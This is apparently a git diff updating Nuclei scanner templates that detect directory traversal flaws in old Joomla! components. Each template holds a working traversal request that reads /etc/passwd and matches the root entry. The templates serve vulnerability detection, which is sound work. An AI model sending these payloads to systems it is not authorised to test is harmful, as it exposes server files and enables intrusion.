- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||
- http://www.securityfocus.com/bid/37692
|
||||
- http://secunia.com/advisories/33486
|
||||
classification:
|
||||
cve-id: CVE-2010-0943
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_jcollection - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
|
||||
- http://www.exploit-db.com/exploits/11088
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0944
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11738
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0972
|
||||
- http://secunia.com/advisories/38925
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0972
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0982
|
||||
- http://www.securityfocus.com/bid/37581
|
||||
- http://secunia.com/advisories/37917
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10948
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0985
|
||||
- http://www.securityfocus.com/bid/37560
|
||||
- http://osvdb.org/61458
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0985
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1056
|
||||
- http://www.securityfocus.com/bid/38741
|
||||
- http://secunia.com/advisories/38982
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-1056
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1081
|
||||
- http://osvdb.org/62506
|
||||
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-1081
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
|
||||
- http://www.securityfocus.com/bid/38866
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,26 +1,30 @@
|
|||
id: CVE-2010-1219
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_janews - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11757
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1219
|
||||
- http://secunia.com/advisories/38952
|
||||
- http://www.securityfocus.com/bid/38746
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1219
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component DW Graph - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11978
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1302
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://www.securityfocus.com/bid/39108
|
||||
- http://secunia.com/advisories/39200
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1302
|
||||
tags: cve,cve2010,joomla,lfi,graph
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component User Status - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11998
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://www.securityfocus.com/bid/39174
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1304
|
||||
tags: cve,cve2010,joomla,lfi,status
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12065
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1305
|
||||
- http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
|
||||
- http://secunia.com/advisories/39351
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1305
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Picasa 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12058
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1306
|
||||
- http://secunia.com/advisories/39338
|
||||
- http://www.securityfocus.com/bid/39200
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1306
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Magic Updater - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12070
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1307
|
||||
- http://secunia.com/advisories/39348
|
||||
- http://www.vupen.com/english/advisories/2010/0806
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1307
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12066
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1308
|
||||
- http://www.vupen.com/english/advisories/2010/0809
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1308
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12077
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1312
|
||||
- http://secunia.com/advisories/39289
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1312
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12082
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1313
|
||||
- http://www.securityfocus.com/bid/39237
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1313
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Highslide 1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12086
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1314
|
||||
- http://secunia.com/advisories/39359
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1314
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue